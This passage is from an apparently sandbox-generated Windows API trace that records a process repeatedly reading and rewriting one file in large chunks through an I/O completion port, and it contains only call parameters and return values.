lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.058] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.059] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.061] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.061] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.078] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.080] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.081] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.081] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.083] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.084] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.085] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.085] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.095] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.096] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.098] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.098] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.099] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.101] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.147] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.147] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.157] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.158] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.159] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.159] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.161] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.162] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.164] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.164] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.174] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.175] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.176] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.176] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.178] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.179] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.223] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.224] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.233] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.235] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.236] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.236] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.238] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.239] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.241] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.241] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.256] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.257] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.290] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.290] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.293] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.294] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.296] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.296] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.339] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.340] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.342] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.342] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.351] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.354] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.355] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.355] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.365] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.366] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.368] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.368] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.382] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.384] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.385] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.385] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.397] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.400] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.402] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.402] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.404] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.406] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.408] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.408] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.461] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.463] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.464] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.464] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.473] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.475] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.476] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.476] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.486] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.488] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.489] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.489] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3fdf908*=0x0, lpOverlapped=0x41f0020) returned 1 [0140.498] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.500] WriteFile (in: hFile=0x610, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3fdf908, lpOverlapped=0x41f0020) returned 1 [0140.501] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3fdf908, lpCompletionKey=0x3fdf904, lpOverlapped=0x3fdf90c) returned 1 [0140.501] ReadFile (in: hFile=0x610, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3fdf908, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, 